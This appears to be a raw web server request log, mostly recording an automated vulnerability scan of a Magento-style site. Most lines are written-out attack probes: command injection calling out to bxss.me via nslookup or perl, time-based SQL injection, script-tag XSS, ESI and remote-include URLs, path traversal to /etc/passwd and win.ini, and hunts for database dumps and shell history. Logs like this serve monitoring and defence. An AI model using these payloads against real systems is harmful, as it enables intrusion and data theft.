/&(nslookup%20hitbpeuatpwpr3806c.bxss.me||perl%20-e%20\"gethostbyname('hitbpeuatpwpr3806c.bxss.me')\")&'\\\"`0&(nslookup%20hitbpeuatpwpr3806c.bxss.me||perl%20-e%20\"gethostbyname('hitbpeuatpwpr3806c.bxss.me')\")&`'/js/varien/form.js 1 -
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/js/prototype/debug.js 1 https://104.36.149.61/
/acc/js/'\"()&%25<acx><ScRiPt%20>sGFI(9333)<%2fScRiPt>/tooltip.js 1 https://104.36.149.61/
/acc/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/mage/adminhtml/backup.js 1 https://104.36.149.61/
/acc/index.php/install//../../../../../../../../windows/win.ini 2 -
/inc/tiny_mce 1 -
/1%20waitfor%20delay%20'0:0:15'%20--%20/js/mage/adminhtml/backup.js 1 https://104.36.149.61/
/IZvLNKfT')%20OR%20751=(SELECT%20751%20FROM%20PG_SLEEP(15))--/skin/adminhtml/default/ 1 https://104.36.149.61/
/acc/js/mage<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/translate.js 1 -
/@@DjdpX/js/prototype/tooltip_manager.js 1 https://104.36.149.61/
/acc/index.php/1some_inexistent_file_with_long_name%00.jpg/ 1 https://104.36.149.61/
/`(nslookup%20hitfhyrprixls42903.bxss.me||perl%20-e%20\"gethostbyname('hitfhyrprixls42903.bxss.me')\")`/js/prototype/windows/ 1 -
/acc/skin/install/default/1%00%c0%a7%c0%a2%252527%252522/css/clears.css 1 https://104.36.149.61/
/acc/.%2fskin/adminhtml/ 1 https://104.36.149.61/
/'+'A'.concat(70-3).concat(22*4).concat(106).concat(86).concat(101).concat(78)+(require'socket'%0aSocket.gethostbyname('hitoq'+'zqdkvyzba34d7.bxss.me.')[3].to_s)+'/js/mage/adminhtml/image.js 1 -
/cgi-bin/q8u64b79n3bq.html 1 https://104.36.149.61/
/static/../../../../../../../../../../../etc/shells 1 -
/acc'\"()&%25<acx><ScRiPt%20>Thnf(9765)<%2fScRiPt>/js/mage/translate.js 1 https://104.36.149.61/
/cgi-bin/q8u64b79n3bq.jsp 1 https://104.36.149.61/
/G94HuJNR'))%20OR%20371=(SELECT%20371%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/1%20waitfor%20delay%20'0:0:15'%20--%20/js/prototype/windows/themes/ 1 https://104.36.149.61/
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/prototype/tooltip.js 1 -
/acc/skin/install/default/%2fxfs.bxss.me/ 1 -
/acc/%3b(nslookup%20hitolvfvbkhja7b0af.bxss.me||perl%20-e%20\"gethostbyname('hitolvfvbkhja7b0af.bxss.me')\")|(nslookup%20hitolvfvbkhja7b0af.bxss.me||perl%20-e%20\"gethostbyname('hitolvfvbkhja7b0af.bxss.me')\")&(nslookup%20hitolvfvbkhja7b0af.bxss.me||perl%2 1 -
/topics 2 -
/(nslookup%20hitojzsuuefxqccee3.bxss.me||perl%20-e%20\"gethostbyname('hitojzsuuefxqccee3.bxss.me')\")/skin/install/default/default/css/ie7minus.css 1 -
/%3b(nslookup%20hitditshvidhwd107f.bxss.me||perl%20-e%20\"gethostbyname('hitditshvidhwd107f.bxss.me')\")|(nslookup%20hitditshvidhwd107f.bxss.me||perl%20-e%20\"gethostbyname('hitditshvidhwd107f.bxss.me')\")&(nslookup%20hitditshvidhwd107f.bxss.me||perl%20-e% 1 -
/Qqgqy16B'))%20OR%20743=(SELECT%20743%20FROM%20PG_SLEEP(15))--/skin/install/default/default/css/boxes.css 1 https://104.36.149.61/
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/install/wizard/locale/ 1 -
/vpn/../vpns/cfg/smb.conf 1 -
/@@tzbgp/js/mage/adminhtml/ 1 https://104.36.149.61/
/acc/skin/install/default/default/1some_inexistent_file_with_long_name%00.jpg/reset.css 1 https://104.36.149.61/
/cgi-bin/compass.rb 1 -
/104.36.149.61_db.sql.tar 1 -
/acc/index.php/install/wizard//../../../../../../../../windows/win.ini%00.jpg 1 -
/acc/skin/install/1some_inexistent_file_with_long_name%00.jpg/default/css/clears.css 1 https://104.36.149.61/
/acc/skin/install/default/%3b(nslookup%20hitwxfsjugzpk9fcba.bxss.me||perl%20-e%20\"gethostbyname('hitwxfsjugzpk9fcba.bxss.me')\")|(nslookup%20hitwxfsjugzpk9fcba.bxss.me||perl%20-e%20\"gethostbyname('hitwxfsjugzpk9fcba.bxss.me')\")&(nslookup%20hitwxfsjugzpk 1 -
/json 1 -
/acc/index.php/install//../../../../../../../../etc/passwd%00.jpg 1 -
/@@TDoWb/js/prototype/windows/ 1 https://104.36.149.61/
/acc/js/.%2fmage/adminhtml/image.js 1 https://104.36.149.61/
/&echo%20wznxnz$()\\%20whbfyg\\nz^xyu||a%20%23'%20&echo%20wznxnz$()\\%20whbfyg\\nz^xyu||a%20%23|\"%20&echo%20wznxnz$()\\%20whbfyg\\nz^xyu||a%20%23/js/mage/ 1 -
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/js/mage/adminhtml/image.js 1 -
/|echo%20xtloto$()\\%20hozcrj\\nz^xyu||a%20%23'%20|echo%20xtloto$()\\%20hozcrj\\nz^xyu||a%20%23|\"%20|echo%20xtloto$()\\%20hozcrj\\nz^xyu||a%20%23/js/prototype/prototype.js 1 -
/tmui/login.jsp 6 -
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/js/mage/adminhtml/grid.js 1 -
/acc/1%00%c0%a7%c0%a2%252527%252522/install/wizard/locale/ 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/skin/install/default/default/css/iestyles.css 1 https://104.36.149.61/
/IQhMQPDN/js/mage/translate.js 1 https://104.36.149.61/
/bxss.me%2ft%2fxss.html%3f%2500/index.php/install/ 1 -
/1some_inexistent_file_with_long_name%00.jpg/js/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/&(nslookup%20hitjmyuqotdjg76207.bxss.me||perl%20-e%20\"gethostbyname('hitjmyuqotdjg76207.bxss.me')\")&'\\\"`0&(nslookup%20hitjmyuqotdjg76207.bxss.me||perl%20-e%20\"gethostbyname('hitjmyuqotdjg76207.bxss.me')\")&`'/skin/install/default/default/css/reset.cs 1 -
/-1%20OR%202+688-688-1=0+0+0+1/index.php/install/ 1 https://104.36.149.61/
/../../../../../web.config 1 -
/acc/index.php/install/wizard/locale//./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ 2 -
/extrahop/ 1 -
/\"%3bprint(md5(31337))%3b$a=\"/js/mage/adminhtml/form.js 1 -
/%2fxfs.bxss.me/js/mage/adminhtml/form.js 1 -
/)/js/prototype/ 1 https://104.36.149.61/
/tomcat/manager/html/ 1 -
/acc/js/prototype/windows/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/ 1 -
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/mage/adminhtml/product/ 1 -
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/adminhtml/uploader/ 1 https://104.36.149.61/
/'.print(md5(31337)).'/js/prototype/debug.js 1 -
/.dockerignore 1 -
/echo%20lsjqhn$()\\%20qbhope\\nz^xyu||a%20%23'%20&echo%20lsjqhn$()\\%20qbhope\\nz^xyu||a%20%23|\"%20&echo%20lsjqhn$()\\%20qbhope\\nz^xyu||a%20%23/js/mage/adminhtml/flexuploader.js 1 -
/acc/js/prototype/%3b(nslookup%20hitpyxtvnmssq4ff38.bxss.me||perl%20-e%20\"gethostbyname('hitpyxtvnmssq4ff38.bxss.me')\")|(nslookup%20hitpyxtvnmssq4ff38.bxss.me||perl%20-e%20\"gethostbyname('hitpyxtvnmssq4ff38.bxss.me')\")&(nslookup%20hitpyxtvnmssq4ff38.bx 1 -
/acc/js/scriptaculous/'\"()&%25<acx><ScRiPt%20>mxOU(9047)<%2fScRiPt>.js 1 https://104.36.149.61/
/acc/js'\"()&%25<acx><ScRiPt%20>bt2L(9409)<%2fScRiPt>/mage/adminhtml/hash.js 1 https://104.36.149.61/
/WOJowMjk/skin/install/default/default/css/boxes.css 1 https://104.36.149.61/
/|(nslookup%20hityqfhcnhfam78e19.bxss.me||perl%20-e%20\"gethostbyname('hityqfhcnhfam78e19.bxss.me')\")/skin/install/default/default/css/iestyles.css 1 -
/104.36.149.61-backup.tar.gz 1 -
/acc/index.php/install/wizard/config///..//..//..//..//..//..//..//..//..//..//../etc/passwd 1 -
/${@print(md5(31337))}\\/js/scriptaculous/effects.js 1 -
/${9999466+10000340}/js/prototype/validation.js 1 -
/|(nslookup%20hitddexrrzebqe03fb.bxss.me||perl%20-e%20\"gethostbyname('hitddexrrzebqe03fb.bxss.me')\")/skin/install/default/default/ 1 -
/authenticationendpoint/cmd.jsp 1 -
/acc/js/prototype/windows/themes<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/ 1 -
/acc/index.php/install//%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/windows/win.ini 1 -
/acc\"%20AND%202*3*8=6*8%20AND%20\"4ENQ\"=\"4ENQ/js/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/104.36.149.61.tgz 1 -
/..%2facc/skin/install/default/default/css/boxes.css 1 https://104.36.149.61/
/acc/skin/install/default/default/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/boxes.css 1 https://104.36.149.61/
/acc/js/.%2fprototype/tooltip_manager.js 1 https://104.36.149.61/
/acc/bxss.me%2ft%2fxss.html%3f%2500/frontend/ 1 -
/&(nslookup%20hitrwfgmdskpgb631c.bxss.me||perl%20-e%20\"gethostbyname('hitrwfgmdskpgb631c.bxss.me')\")&'\\\"`0&(nslookup%20hitrwfgmdskpgb631c.bxss.me||perl%20-e%20\"gethostbyname('hitrwfgmdskpgb631c.bxss.me')\")&`'/js/mage/ 1 -
/\"+\"A\".concat(70-3).concat(22*4).concat(110).concat(65).concat(105).concat(69)+(require\"socket\"%0aSocket.gethostbyname(\"hitfy\"+\"erwhcvsjcae1b.bxss.me.\")[3].to_s)+\"/js/mage/adminhtml/giftoptions/ 1 -
/acc/skin/1some_inexistent_file_with_long_name%00.jpg/default/default/css/iestyles.css 1 https://104.36.149.61/
/acc/index.php/install/.%2fwizard/config/ 1 https://104.36.149.61/
/acc/index.php/install/wizard/locale/../../../../../package.json 1 -
/acc/skin/install/default/default/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/iestyles.css 1 https://104.36.149.61/
/..%2facc/skin/install/default/default/css/clears.css 1 https://104.36.149.61/
/backup.sql.tar 1 -
/../../../../web.config 1 -
/if(now()=sysdate(),sleep(15),0)/js/varien/js.js 1 https://104.36.149.61/
/104.36.149.61-dump.sql.gz 1 -
/acc/js/%2fxfs.bxss.me/adminhtml/image.js 1 -
/acc/js'\"()&%25<acx><ScRiPt%20>Rirk(9705)<%2fScRiPt>/varien/js.js 1 https://104.36.149.61/
/acc/js/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/prototype.js 1 -
/acc'\"()&%25<acx><ScRiPt%20>ja2b(9413)<%2fScRiPt>/js/prototype/tooltip_manager.js 1 https://104.36.149.61/
/acc/js/%3b(nslookup%20hittvgcghgtla21dcc.bxss.me||perl%20-e%20\"gethostbyname('hittvgcghgtla21dcc.bxss.me')\")|(nslookup%20hittvgcghgtla21dcc.bxss.me||perl%20-e%20\"gethostbyname('hittvgcghgtla21dcc.bxss.me')\")&(nslookup%20hittvgcghgtla21dcc.bxss.me||per 1 -
//localconfig.php 1 -
/if(now()=sysdate(),sleep(15),0)/js/mage/translate.js 1 https://104.36.149.61/
/acc/js/%3b(nslookup%20hitwjulkciopc915d0.bxss.me||perl%20-e%20\"gethostbyname('hitwjulkciopc915d0.bxss.me')\")|(nslookup%20hitwjulkciopc915d0.bxss.me||perl%20-e%20\"gethostbyname('hitwjulkciopc915d0.bxss.me')\")&(nslookup%20hitwjulkciopc915d0.bxss.me||per 1 -
/http://bxss.me/t/fit.txt%3F.jpg/index.php/install/wizard/config/ 1 https://104.36.149.61/
/acc/skin/'\"()&%25<acx><ScRiPt%20>c1E3(9078)<%2fScRiPt>/default/default/css/ie7minus.css 1 https://104.36.149.61/
/acc/skin/install/default/default/css/.%2fboxes.css 1 https://104.36.149.61/
/acc/js/mage/..%2fadminhtml/accordion.js 1 https://104.36.149.61/
/Http://bxss.me/t/fit.txt/index.php/install/ 1 https://104.36.149.61/
/|(nslookup%20hitfuvoehkvav08a48.bxss.me||perl%20-e%20\"gethostbyname('hitfuvoehkvav08a48.bxss.me')\")/js/mage/adminhtml/hash.js 1 -
/acc/skin/install/default/default/12345'\"\\'\\\") 5 https://104.36.149.61/
/echo%20dmjuic$()\\%20ffxoon\\nz^xyu||a%20%23'%20&echo%20dmjuic$()\\%20ffxoon\\nz^xyu||a%20%23|\"%20&echo%20dmjuic$()\\%20ffxoon\\nz^xyu||a%20%23/js/mage/adminhtml/image.js 1 -
/etc/shells 1 -
/%2fxfs.bxss.me/js/mage/adminhtml/product/ 1 -
/acc/skin/./WEB-INF/web.xml%00.jsp 2 -
/acc/index.php/.%2finstall/wizard/config/ 1 https://104.36.149.61/
/\"+response.write(9598149*9564332)+\"/js/scriptaculous/effects.js 1 -
/!(()&&!|*|*|/js/prototype/debug.js 1 https://104.36.149.61/
/acc/'\"()&%25<acx><ScRiPt%20>8tiP(9615)<%2fScRiPt>/frontend/ 1 https://104.36.149.61/
/../../Gemfile 1 -
/acc/js/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/windows/themes/ 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/install/default/ 1 https://104.36.149.61/
/&(nslookup%20hitffcrtwknat1ebe7.bxss.me||perl%20-e%20\"gethostbyname('hitffcrtwknat1ebe7.bxss.me')\")&'\\\"`0&(nslookup%20hitffcrtwknat1ebe7.bxss.me||perl%20-e%20\"gethostbyname('hitffcrtwknat1ebe7.bxss.me')\")&`'/js/prototype/tooltip_manager.js 1 -
/${9999236+9999521}/skin/install/default/default/css/reset.css 1 -
/WEB-INF/Copy%20of%20jboss-web.xml 1 -
/acc/index.php/'\"()&%25<acx><ScRiPt%20>KhMd(9945)<%2fScRiPt>/wizard/config/ 1 https://104.36.149.61/
/\"+\"A\".concat(70-3).concat(22*4).concat(115).concat(75).concat(114).concat(75)+(require\"socket\"%0aSocket.gethostbyname(\"hitku\"+\"othekwak8b90e.bxss.me.\")[3].to_s)+\"/skin/install/default/default/css/boxes.css 1 -
/cgi-bin/config.xml 1 -
/.%2facc/index.php/install/wizard/locale/ 1 https://104.36.149.61/
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/js.js 1 https://104.36.149.61/
/acc/index.php/..%2f..%2f..%2f..%2f..%2fweb.config 1 -
/!(()&&!|*|*|/js/mage/adminhtml/image.js 1 https://104.36.149.61/
/<!--/js/mage/adminhtml/events.js 1 -
/%2fxfs.bxss.me/js/mage/adminhtml/image.js 1 -
/acc/index.php<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/install/ 1 -
/acc%25'%20AND%202*3*8=6*8%20AND%20'rytz'!='rytz%25/js/prototype/tooltip_manager.js 1 https://104.36.149.61/
/104-backup.sql.gz 1 -
/)/index.php/install/wizard/locale/ 1 https://104.36.149.61/
/`(nslookup%20hitmaswwzleyd728a0.bxss.me||perl%20-e%20\"gethostbyname('hitmaswwzleyd728a0.bxss.me')\")`/js/prototype/tooltip_manager.js 1 -
/opennms/login.jsp 1 -
/acc/1%00%c0%a7%c0%a2%252527%252522/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/backup.tar 1 -
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/skin/install/default/default/css/reset.css 1 https://104.36.149.61/
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/js/mage/ 1 -
/acc/js/mage'\"()&%25<acx><ScRiPt%20>yxiC(9937)<%2fScRiPt>/adminhtml/giftoptions/ 1 https://104.36.149.61/
/acc/'\"()&%25<acx><ScRiPt%20>JGJG(9011)<%2fScRiPt>/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/acc/skin/install/'\"()&%25<acx><ScRiPt%20>xIbD(9693)<%2fScRiPt>/default/css/reset.css 1 https://104.36.149.61/
/acc/skin/..%2fadminhtml/ 1 https://104.36.149.61/
/!(()&&!|*|*|/js/prototype/extended_debug.js 1 https://104.36.149.61/
/acc/js/prototype<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/windows/ 1 -
/acc/skin/install/default/default/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/clears.css 1 https://104.36.149.61/
/&(nslookup%20hitxnlcpkamek0acd8.bxss.me||perl%20-e%20\"gethostbyname('hitxnlcpkamek0acd8.bxss.me')\")&'\\\"`0&(nslookup%20hitxnlcpkamek0acd8.bxss.me||perl%20-e%20\"gethostbyname('hitxnlcpkamek0acd8.bxss.me')\")&`'/js/mage/adminhtml/grid.js 1 -
/.%2facc/skin/install/default/default/css/clears.css 1 https://104.36.149.61/
/acc/js/mage/adminhtml'\"()&%25<acx><ScRiPt%20>q8Xa(9812)<%2fScRiPt>/browser.js 1 https://104.36.149.61/
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/index.php/install/wizard/locale/ 1 -
//index.php/install/ 1 https://104.36.149.61/
/acc'||'/js/prototype/tooltip.js 1 https://104.36.149.61/
/^(%23$!@%23$)(()))******/js/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/lib/js/extjs//examples/feed-viewer/feed-proxy.php 1 -
/acc/js/prototype/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd.js 1 https://104.36.149.61/
/${@print(md5(31337))}\\/skin/install/default/default/css/boxes.css 1 -
/authenticationendpoint/c4k.jsp 1 -
/acc/index.php/install/wizard/../../../../package.json 1 -
/appsettings.json 1 -
/\".gethostbyname(lc(\"hitbb\".\"mnqgxmakfb656.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(110).chr(76).chr(101).chr(87).\"/skin/install/default/default/ 1 -
/acc/js/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/adminhtml/image.js 1 -
/1%00%c0%a7%c0%a2%252527%252522/js/mage/adminhtml/ 1 https://104.36.149.61/
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/prototype/windows/themes/ 1 https://104.36.149.61/
/acc/..%2fskin/install/default/default/css/boxes.css 1 https://104.36.149.61/
/acc'\"()&%25<acx><ScRiPt%20>mwZT(9224)<%2fScRiPt>/js/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/odPY9gaR/js/mage/adminhtml/image.js 1 https://104.36.149.61/
/1some_inexistent_file_with_long_name%00.jpg/js/scriptaculous/effects.js 1 https://104.36.149.61/
/${10000445+9999416}/js/prototype/windows/ 1 -
/acc/js/1%00%c0%a7%c0%a2%252527%252522/tooltip.js 1 https://104.36.149.61/
/acc/js/mage/adminhtml/.%2fgiftoptions/ 1 https://104.36.149.61/
/)/js/mage/adminhtml/ 1 https://104.36.149.61/
/${@print(md5(31337))}\\/skin/install/default/default/css/reset.css 1 -
/jvyr0ehozmbg.php 1 https://104.36.149.61/
/q88zdtUD/js/prototype/prototype.js 1 https://104.36.149.61/
//skin/adminhtml/ 1 https://104.36.149.61/
/vendor/../../../../../../../../../../../../../etc/shells 1 -
/acc/js/%2fxfs.bxss.me/adminhtml/giftoptions/ 1 -
/acc/js/bxss.me%2ft%2fxss.html%3f%2500/effects.js 1 -
/acc/index.php/install/1%00%c0%a7%c0%a2%252527%252522/config/ 1 https://104.36.149.61/
/Eescafl2')%20OR%20341=(SELECT%20341%20FROM%20PG_SLEEP(15))--/js/prototype/windows/ 1 https://104.36.149.61/
/acc/js/mage/adminhtml/sales.js/977124%40 1 https://104.36.149.61/
/${10000192+10000183}/skin/frontend/ 1 -
/package.json 1 -
/104-dump.sql.tar 1 -
/\".gethostbyname(lc(\"hittp\".\"pzfdznyvd0c14.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(102).chr(85).chr(99).chr(78).\"/skin/frontend/ 1 -
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/js/mage/adminhtml/browser.js 1 https://104.36.149.61/
/manager/phpThumb/phpThumb.php 1 -
/'%3bprint(md5(31337))%3b$a='/js/prototype/windows/themes/ 1 -
/${@print(md5(31337))}/js/mage/adminhtml/form.js 1 -
/acc/js/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/windows/ 1 https://104.36.149.61/
/http://bxss.me/t/fit.txt%3F.jpg/js/mage/ 1 https://104.36.149.61/
/.htaccess.save 1 -
/104_db.tar 1 -
/'.gethostbyname(lc('hitcj'.'xaqrwywv17e21.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(65).chr(99).chr(68).'/js/mage/adminhtml/wysiwyg/ 1 -
/http://bxss.me/t/fit.txt%3F.jpg/skin/install/default/default/css/iestyles.css 1 https://104.36.149.61/
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/adminhtml/backup.js 1 https://104.36.149.61/
/.histfile 1 -
//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows/win.ini 1 -
/acc/skin/install/default/default/bxss.me%2ft%2fxss.html%3f%2500/reset.css 1 -
/bxss.me/js/mage/adminhtml/form.js 1 https://104.36.149.61/
/acc/skin<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/install/default/default/ 1 -
/'\"()&%25<acx><ScRiPt%20>QEM2(9399)<%2fScRiPt>/js/mage/adminhtml/form.js 1 https://104.36.149.61/
/acc/js/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/adminhtml/ 1 https://104.36.149.61/
/'.print(md5(31337)).'/js/mage/adminhtml/hash.js 1 -
/acc'\"()&%25<acx><ScRiPt%20>2DaK(9342)<%2fScRiPt>/js/mage/ 1 https://104.36.149.61/
/-1%20OR%203+476-476-1=0+0+0+1/js/mage/adminhtml/form.js 1 https://104.36.149.61/
/acc/skin/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/ 1 https://104.36.149.61/
/`(nslookup%20hitgutbeluclgf87b6.bxss.me||perl%20-e%20\"gethostbyname('hitgutbeluclgf87b6.bxss.me')\")`/js/mage/adminhtml/giftmessage.js 1 -
/1xAKy1oR')%20OR%20543=(SELECT%20543%20FROM%20PG_SLEEP(15))--/js/scriptaculous/effects.js 1 https://104.36.149.61/
/Http://bxss.me/t/fit.txt/js/prototype/debug.js 1 https://104.36.149.61/
/storage/logs/laravel.log 2 -
/acc/js/prototype/%2fxfs.bxss.me/themes/ 1 -
/`(nslookup%20hitrqitetsudyeb644.bxss.me||perl%20-e%20\"gethostbyname('hitrqitetsudyeb644.bxss.me')\")`/js/varien/form.js 1 -
/acc'\"()&%25<acx><ScRiPt%20>fIWy(9947)<%2fScRiPt>/js/prototype/ 1 https://104.36.149.61/
//index.php/install/wizard/locale/ 1 https://104.36.149.61/
/../web.config 1 -
/TxewtP1i/js/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/acc/'\"()&%25<acx><ScRiPt%20>PQf4(9362)<%2fScRiPt>/adminhtml/ 1 https://104.36.149.61/
/../../../Gemfile 1 -
/'%3bprint(md5(31337))%3b$a='/js/mage/adminhtml/grid.js 1 -
/acc/skin/install/%3b(nslookup%20hitmldogdkhnrdfd07.bxss.me||perl%20-e%20\"gethostbyname('hitmldogdkhnrdfd07.bxss.me')\")|(nslookup%20hitmldogdkhnrdfd07.bxss.me||perl%20-e%20\"gethostbyname('hitmldogdkhnrdfd07.bxss.me')\")&(nslookup%20hitmldogdkhnrdfd07.bx 1 -
/index.asp 1 -
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/js/scriptaculous/effects.js 1 -
//js/mage/adminhtml/image.js 1 https://104.36.149.61/
/1%00%c0%a7%c0%a2%252527%252522/js/prototype/ 1 https://104.36.149.61/
/A9C1Whkn'%3b%20waitfor%20delay%20'0:0:15'%20--%20/js/prototype/tooltip.js 1 https://104.36.149.61/
/acc'%20AND%202*3*8=6*8%20AND%20'6JHL'='6JHL/js/prototype/extended_debug.js 1 https://104.36.149.61/
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/debug.js 1 https://104.36.149.61/
/acc/.%2fjs/prototype/tooltip_manager.js 1 https://104.36.149.61/
/'.print(md5(31337)).'/js/mage/adminhtml/browser.js 1 -
/104-database.sql.gz 1 -
/acc/js/mage/adminhtml/sales/./WEB-INF/web.xml%00.jsp 2 -
/acc/js/prototype'\"()&%25<acx><ScRiPt%20>sjVf(9957)<%2fScRiPt>/windows/themes/ 1 https://104.36.149.61/
/.%2facc/js/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/acc/index.php/install/..%2f..%2fpackage.json 1 -
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/js/prototype/windows/ 1 https://104.36.149.61/
/104_db.sql.tar 1 -
/47ZoN6gK'))%20OR%20922=(SELECT%20922%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/acc/skin/install/bxss.me%2ft%2fxss.html%3f%2500/default/ 1 -
/lol.php 1 -
/bxss.me/index.php/install/ 1 https://104.36.149.61/
/acc/skin/install/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/default/ 1 https://104.36.149.61/
/response.write(9393742*9068100)/js/mage/adminhtml/flexuploader.js 1 -
/acc/js/prototype/'\"()&%25<acx><ScRiPt%20>JN5X(9916)<%2fScRiPt>/ 1 https://104.36.149.61/
/acc/index.php/install/wizard/config/..%2f..%2fweb.config 1 -
/www/js/tinymce 1 -
/%3b(nslookup%20hitstuyblpmce9e7bc.bxss.me||perl%20-e%20\"gethostbyname('hitstuyblpmce9e7bc.bxss.me')\")|(nslookup%20hitstuyblpmce9e7bc.bxss.me||perl%20-e%20\"gethostbyname('hitstuyblpmce9e7bc.bxss.me')\")&(nslookup%20hitstuyblpmce9e7bc.bxss.me||perl%20-e% 1 -
/acc/skin'\"()&%25<acx><ScRiPt%20>Ijhk(9854)<%2fScRiPt>/install/default/default/css/boxes.css 1 https://104.36.149.61/
/acc//mage/adminhtml/sales/ 1 https://104.36.149.61/
/'\"()&%25<acx><ScRiPt%20>dgnk(9106)<%2fScRiPt>/skin/install/default/default/css/iestyles.css 1 https://104.36.149.61/
/.bash_history 1 -
/acc/index.php/install/../../../../package-lock.json 1 -
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/skin/adminhtml/ 1 -
/acc/js/1some_inexistent_file_with_long_name%00.jpg/tooltip.js 1 https://104.36.149.61/
/\"+response.write(9274962*9075082)+\"/skin/install/default/default/ 1 -
/xmlrpc.asp 4 -
/acc/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/install/default/default/ 1 https://104.36.149.61/
/acc/%2fxfs.bxss.me/prototype/tooltip_manager.js 1 -
/<!--/index.php/install/wizard/locale/ 1 -
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/js/varien/form.js 1 https://104.36.149.61/
/admin/tiny_mce 1 -
/backup_104.tar.gz 1 -
/acc9564841/js/mage/adminhtml/events.js 1 https://104.36.149.61/
/solr/ 2 -
/acc/js/mage/%2fxfs.bxss.me/form.js 1 -
/)/skin/adminhtml/ 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/js/mage/adminhtml/product/ 1 https://104.36.149.61/
/acc/js/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/adminhtml/events.js 1 -
